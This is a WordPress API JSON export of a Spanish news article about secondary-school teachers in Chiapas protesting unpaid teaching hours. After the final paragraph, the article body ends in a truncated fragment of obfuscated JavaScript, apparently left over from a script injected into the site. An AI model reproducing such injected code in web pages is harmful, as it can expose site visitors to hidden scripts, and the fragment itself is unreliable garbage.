{"id":11673,"date":"2023-09-05T02:18:07","date_gmt":"2023-09-05T02:18:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11673"},"modified":"2023-09-05T02:18:08","modified_gmt":"2023-09-05T02:18:08","slug":"maestros-piden-que-les-paguen-los-justo-por-horas-trabajadas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11673","title":{"rendered":"Maestros piden que les paguen los justo por horas trabajadas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1693880214047-1024x576.jpg\" alt=\"\" class=\"wp-image-11674\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1693880214047-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1693880214047-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1693880214047-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1693880214047.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>4 de septiembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Decenas de maestros del grupo denominado \u201cAcademias en Resistencia\u201d del nivel de secundarias t\u00e9cnicas, en el estado de Chiapas realizaron una protesta en el centro de Tuxtla, para exigir se les reconozca un mayor n\u00famero de horas frente a grupo.<\/p>\n\n\n\n<p>Recordaron que son cientos de maestros, que laboran hasta cinco horas de m\u00e1s sin recibir el sueldo correspondiente.<\/p>\n\n\n\n<p>\u201cEl acuerdo 593, respaldado en el plan 2011 no fue atendido en el estado de Chiapas. En el 2012, con una movilizaci\u00f3n como trabajadores de base sin respaldo del Comit\u00e9 Ejecutivo Seccional lograron el pas\u00f3 de 3, a 5 y 8 horas de base para la materia de tecnolog\u00edas para primer grado\u201d, precis\u00f3, Alejandro Ovando Rodr\u00edguez, coordinador de este grupo<\/p>\n\n\n\n<p>Fue a partir de este momento en que, la autoridad, les dio a conocer que, de manera gradual, se ir\u00eda incrementado para lo otros grados, pero hasta la fecha no se ha cumplido este compromiso.<\/p>\n\n\n\n<p>\u201cA este contexto se suma la academia de arte que pasa de 2 a 3 horas a la semana, y desde el 2017 no se ha respetado esa ley en el estado de Chiapas, tenemos las pruebas de esos acuerdos logrados desde el 2018, y se ratifica ene este 2023, en donde se especifica que se deja a 8 horas semanal para tecnolog\u00edas y 3 para la materia de artes\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Expuso que, existe, rezago en la Secretar\u00eda de Educaci\u00f3n, puesto que hasta el d\u00eda de hoy, la petici\u00f3n, no ha sido atendida.<\/p>\n\n\n\n<p>\u201cA pesar de que, hemos ido incluso a la ma\u00f1anera, a exponer este problema y nos consta que el gobierno de la Rep\u00fablica, a la Secretar\u00eda de Educaci\u00f3n en Chiapas para ser atendidos, pero esto no ha pasado, no tenemos atenci\u00f3n\u201d, indic\u00f3.<\/p>\n\n\n\n<p>Lament\u00f3 que, no es el \u00fanico grupo de manifestantes que, requiere atenci\u00f3n por parte de las autoridades y est\u00e1n en la misma situaci\u00f3n.<\/p>\n\n\n\n<p>Se trata de por lo menos 300 docentes de tecnolog\u00edas que no les reconocen sus 8 horas en la entidad, 3250 horas, mientras que artes, son 158 maestros que est\u00e1n siendo afectados, no se les reconoce las tres horas semanales, se les paga dos.<\/p>\n\n\n\n<p>Pero, esto no es todo, pues tienen conocimiento, que estas horas s\u00ed ser\u00e1n reconocidas a maestros de nuevo ingreso y no aquellos que llevan 15 o m\u00e1s a\u00f1os en servicio.<\/p>\n\n\n\n<p>Ante ello, expuso que, este mismo lunes sostendr\u00edan una reuni\u00f3n con autoridades de educaci\u00f3n y dependiendo de la respuesta ser\u00eda las acciones que tomar\u00e1n en lo inmediato.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 4 de septiembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Decenas de maestros del grupo denominado \u201cAcademias en Resistencia\u201d del nivel de secundarias t\u00e9cnicas, en el estado de Chiapas realizaron una protesta en el centro de Tuxtla, para exigir se les reconozca un mayor n\u00famero de horas frente a grupo. Recordaron que son cientos de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11674,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-11673","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11673","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11673"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11673\/revisions"}],"predecessor-version":[{"id":11675,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11673\/revisions\/11675"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11674"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11673"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11673"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11673"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}